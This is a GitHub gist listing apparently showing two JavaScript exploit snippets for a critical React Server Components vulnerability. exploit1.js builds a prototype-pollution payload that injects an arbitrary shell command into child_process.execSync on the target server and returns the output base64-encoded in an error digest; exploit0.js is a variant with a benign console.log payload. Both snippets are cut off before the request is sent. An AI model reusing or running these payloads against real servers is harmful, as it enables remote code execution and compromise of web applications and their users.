Skip to content

Instantly share code, notes, and snippets.

View akshaymarch7's full-sized avatar
🤒
High on Javascript

Akshay Saini akshaymarch7

🤒
High on Javascript
4.4k followers · 1 following
View GitHub Profile
@akshaymarch7
akshaymarch7 / exploit1.js
Created December 16, 2025 05:01
React Critical Vulnerability (CVSS 10.0) - exploit1 code
(async () => {
// === CONFIGURATION ===
const cmd = "touch iWasHere"; // The command you want to run
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
@akshaymarch7
akshaymarch7 / exploit0.js
Created December 16, 2025 04:59
React Critical Vulnerability (CVSS 10.0) - exploit0 code
(async () => {
// === CONFIGURATION ===
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"console.log('meowmeow')//","_formData":{"get":"$1:constructor:constructor"}}}`;